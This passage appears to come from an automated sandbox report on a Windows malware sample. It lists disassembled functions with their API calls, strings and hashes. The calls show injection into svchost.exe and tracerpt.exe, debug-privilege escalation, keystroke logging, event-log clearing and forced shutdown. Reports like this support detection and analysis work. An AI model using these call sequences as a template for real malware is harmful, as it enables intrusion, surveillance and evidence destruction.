                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 036278DA
                                                                                                                              • Part of subcall function 03627740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,036278FC), ref: 03627756
                                                                                                                              • Part of subcall function 03627740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,036278FC,?,?,?,?,?,?,74DF0630), ref: 0362775D
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362790A
                                                                                                                            • _memset.LIBCMT ref: 03627923
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362793B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627944
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627956
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627959
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362796B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0362796E
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627980
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627983
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362798B
                                                                                                                            • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627992
                                                                                                                            • _memset.LIBCMT ref: 036279B4
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 036279CA
                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 036279FF
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03627A1B
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03627A43
                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03627A58
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,036276F0,00001000,00000000), ref: 03627A72
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03627A90
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03627AA1
                                                                                                                            • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03627ABA
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03627AD6
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03627AE8
                                                                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03627AF1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                            • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                            • API String ID: 4176418925-3213446972
                                                                                                                            • Opcode ID: dd092883a7277c23f130c9dd79769fa323b948766cbb554ffaed236f773d449f
                                                                                                                            • Instruction ID: 17245076104879e1c588bfc40f101f3b4b18156803257ecab6ba7129017356db
                                                                                                                            • Opcode Fuzzy Hash: dd092883a7277c23f130c9dd79769fa323b948766cbb554ffaed236f773d449f
                                                                                                                            • Instruction Fuzzy Hash: 7281A775E403287BD721EB619C49FDF7BBCAF95B00F100498F709A6185DBB49A84CE64
                                                                                                                            Function 02C35820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 02C35849
                                                                                                                            • _memset.LIBCMT ref: 02C35868
                                                                                                                            • _memset.LIBCMT ref: 02C3589D
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02C358B1
                                                                                                                              • Part of subcall function 02C359E0: _vswprintf_s.LIBCMT ref: 02C359F1
                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C358E0
                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02C35928
                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C3594E
                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C35968
                                                                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C35987
                                                                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C359A2
                                                                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C359C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                            • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                            • API String ID: 2170139861-1986163084
                                                                                                                            • Opcode ID: 338334d9f2875664ff93fd00600f687c168b0f2813b65ec4cb89e22707d6f9f5
                                                                                                                            • Instruction ID: e95c85b5979e27831698e6026945c6017af18efa562414b98c704229a39b781a
                                                                                                                            • Opcode Fuzzy Hash: 338334d9f2875664ff93fd00600f687c168b0f2813b65ec4cb89e22707d6f9f5
                                                                                                                            • Instruction Fuzzy Hash: A441B7B4A40308AFE721DF60DC45FAA77B8AF58740F50499DB64DA7180DBB0AB84CF94
                                                                                                                            Function 03627E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 03627E73
                                                                                                                            • _memset.LIBCMT ref: 03627E9F
                                                                                                                            • _memset.LIBCMT ref: 03627ED4
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03627EE8
                                                                                                                              • Part of subcall function 03628720: _vswprintf_s.LIBCMT ref: 03628731
                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 03627F15
                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03627F65
                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03627F92
                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03627FAA
                                                                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03627FCC
                                                                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03627FEA
                                                                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03627FFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                            • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                            • API String ID: 2170139861-2473635271
                                                                                                                            • Opcode ID: 6061d34d1b48ac4f623fc1bf91e76ee32007fcf9ba085cf2279201b5282a6874
                                                                                                                            • Instruction ID: b8380a5c9e96c5291f3f27f8eea71c0ec68dee6bbc4339306193cf53e1441ba3
                                                                                                                            • Opcode Fuzzy Hash: 6061d34d1b48ac4f623fc1bf91e76ee32007fcf9ba085cf2279201b5282a6874
                                                                                                                            • Instruction Fuzzy Hash: B24191B5E00318ABDB20DB61DC95FEE7BBCAB45B00F1051D9B609A6285DBB09B84CF54
                                                                                                                            Function 0362E4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03650D80,74DEE010,74DF2FA0,74DF0F00,?,03626028,?,?), ref: 0362E519
                                                                                                                            • lstrcatW.KERNEL32(03650D80,\DisplaySessionContainers.log,?,03626028,?,?), ref: 0362E529
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,03650D80,?,03626028,?,?), ref: 0362E538
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03626028,?,?), ref: 0362E546
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03626028,?,?), ref: 0362E563
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,03626028,?,?), ref: 0362E56E
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,03626028,?,?), ref: 0362E577
                                                                                                                            • DeleteFileW.KERNEL32(03650D80,?,03626028,?,?), ref: 0362E58A
                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,03626028,?,?), ref: 0362E597
                                                                                                                            • DirectInput8Create.DINPUT8(?,00000800,03644934,03651220,00000000,?,03626028,?,?), ref: 0362E5B2
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362E665
                                                                                                                            • GetKeyState.USER32(00000014), ref: 0362E672
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                            • String ID: <$\DisplaySessionContainers.log
                                                                                                                            • API String ID: 1095970075-1170057892
                                                                                                                            • Opcode ID: 0ec5e85f75960dafc715dbc2a4db8f90336255d09c5386f22ca3d94ecd3282ad
                                                                                                                            • Instruction ID: 2f6299d331bd71b8d5f23dd69dd9f8e0836b2b3778a928143d5f7912e8c0eb2d
                                                                                                                            • Opcode Fuzzy Hash: 0ec5e85f75960dafc715dbc2a4db8f90336255d09c5386f22ca3d94ecd3282ad
                                                                                                                            • Instruction Fuzzy Hash: 47416B74B40315AFDB10EFA4EC55F9A7FA4AB49704F205528F615EB288C772E8418F58
                                                                                                                            Function 03627620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0362DFA4), ref: 03627637
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0362DFA4), ref: 0362763E
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0362765A
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627677
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627681
                                                                                                                            • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0362DFA4), ref: 03627691
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627698
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 036276BA
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 036276C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                            • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                            • API String ID: 1802016953-1577477132
                                                                                                                            • Opcode ID: 1a6f9f7964696c21630313149c25cc3d369a89ffe9679a87ae286ac58e9671fa
                                                                                                                            • Instruction ID: 6941d37b960488303a06031e1abca84246926e73b123e2e8f1dbd4b0021c12a4
                                                                                                                            • Opcode Fuzzy Hash: 1a6f9f7964696c21630313149c25cc3d369a89ffe9679a87ae286ac58e9671fa
                                                                                                                            • Instruction Fuzzy Hash: 8B216075E40318AFD710EFE4DC1AFBE7BB8EB09B00F104509FA05AA285CBB159448BA5
                                                                                                                            Function 0363054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03630576
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0363058E
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0363059E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 036305AE
                                                                                                                            • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03630600
                                                                                                                            • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03630615
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                            • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                            • API String ID: 3290314748-423161677
                                                                                                                            • Opcode ID: d46b1f521076bac3e2d12324c4cc1ae6a2e65d3fad2b6444de425dfa2f1ef2d4
                                                                                                                            • Instruction ID: 2340f6602fafa6ac6020534007670b8bc3545a41df5f47c44ef943c06ab68514
                                                                                                                            • Opcode Fuzzy Hash: d46b1f521076bac3e2d12324c4cc1ae6a2e65d3fad2b6444de425dfa2f1ef2d4
                                                                                                                            • Instruction Fuzzy Hash: 0C31D575E40219ABDB10DBA0DD84AEFBBB8EF46754F140425F602E7148DB70AA08CB94
                                                                                                                            Function 03627B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                            • GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 3435690185-3733053543
                                                                                                                            • Opcode ID: d55c0c42a0314c5df523c1371cf39d4036322fed5b827cdff964d2b7cdfd0ac6
                                                                                                                            • Instruction ID: 6f74c184d88d685479af4cd9add06bc96a1608fd46345a78cd3fbcf86aac7a54
                                                                                                                            • Opcode Fuzzy Hash: d55c0c42a0314c5df523c1371cf39d4036322fed5b827cdff964d2b7cdfd0ac6
                                                                                                                            • Instruction Fuzzy Hash: BB119475E40218ABDB10EFB4DC19FAF7BB8EF08B01F504959F905AB184CB719940CBA4
                                                                                                                            Function 0362B3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenEventLogW.ADVAPI32(00000000,036458BC), ref: 0362B3E7
                                                                                                                            • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0362B3F2
                                                                                                                            • CloseEventLog.ADVAPI32(00000000), ref: 0362B3F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$ClearCloseOpen
                                                                                                                            • String ID: Application$Security$System
                                                                                                                            • API String ID: 1391105993-2169399579
                                                                                                                            • Opcode ID: 26024555e6537c3753beb1f6dbda5956fff5b548f172f2c0b425c45cce36ab15
                                                                                                                            • Instruction ID: 75331c152f8e991773cce0827db6f6be1aa2136c5539e898e8f209fd98a6cd83
                                                                                                                            • Opcode Fuzzy Hash: 26024555e6537c3753beb1f6dbda5956fff5b548f172f2c0b425c45cce36ab15
                                                                                                                            • Instruction Fuzzy Hash: B8E0E536E056344BC321EF05A844B1EF7D0FBC9705F14050DFA4897208CB3088058B99
                                                                                                                            Function 034A660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: swprintf$_memset
                                                                                                                            • String ID: :$@
                                                                                                                            • API String ID: 1292703666-1367939426
                                                                                                                            • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                            • Instruction ID: 09de9276c0957a53905a2c2dace81922c5995f33e9abbcaaf9a9dcdb30eaba2c
                                                                                                                            • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                            • Instruction Fuzzy Hash: 15315EB6D0021CABDB14CBE9CC85FEEB7B9FB88300F50421DE91AAB241E6746945CB54
                                                                                                                            Function 03627740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,036278FC), ref: 03627756
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,036278FC,?,?,?,?,?,?,74DF0630), ref: 0362775D
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03627785
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 036277B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                            • API String ID: 2349140579-2896544425
                                                                                                                            • Opcode ID: b28758308e883eaac73a2fe2a46f9584d35ee9c252653fa3c5fa49d26e844812
                                                                                                                            • Instruction ID: eef930736945958d4fff36e366350628296cde5971057490c3c753ff5fc42d8b
                                                                                                                            • Opcode Fuzzy Hash: b28758308e883eaac73a2fe2a46f9584d35ee9c252653fa3c5fa49d26e844812
                                                                                                                            • Instruction Fuzzy Hash: 6A118E74E40208ABDB00DFE5C81AFAEBBB4EF08B00F108558F505AB284DBB5A904CB60
                                                                                                                            Function 02C36815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 02C3793D
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C37952
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(02C45350), ref: 02C3795D
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 02C37979
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 02C37980
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 782dc9429c1d0d8736a732dc5be5bb60c7c404e1d7bf224ae61bc345cd3d7ad5
                                                                                                                            • Instruction ID: 88d2bfadb9cd8240b5fa6478a670b798c85b6adc1b6eafde63e82f442a1bd429
                                                                                                                            • Opcode Fuzzy Hash: 782dc9429c1d0d8736a732dc5be5bb60c7c404e1d7bf224ae61bc345cd3d7ad5
                                                                                                                            • Instruction Fuzzy Hash: C421D2BCCC4A04DFE782DF68E56975B3BE5BB08395F401A19E50987240EBB656A0CF05
                                                                                                                            Function 0362F00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0363131C
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03631331
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(036425B8), ref: 0363133C
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 03631358
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0363135F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: c2e781d9a8238eb99f1115241ee3dd9c473007c27d9b8fc0575ad04d77667438
                                                                                                                            • Instruction ID: 2a3e7c88f38b8100c2b03e5be47ac683bb09930196fde501d2d580641bba41ea
                                                                                                                            • Opcode Fuzzy Hash: c2e781d9a8238eb99f1115241ee3dd9c473007c27d9b8fc0575ad04d77667438
                                                                                                                            • Instruction Fuzzy Hash: 5621BEBDD84244DFD740FF28F15564A3BB4BB0A300F60A45AE9088B38CEBB09580CF59
                                                                                                                            Function 0362B463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03627B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                              • Part of subcall function 03627B70: OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                              • Part of subcall function 03627B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                              • Part of subcall function 03627B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                              • Part of subcall function 03627B70: GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • ExitWindowsEx.USER32(00000005,00000000), ref: 0362B471
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
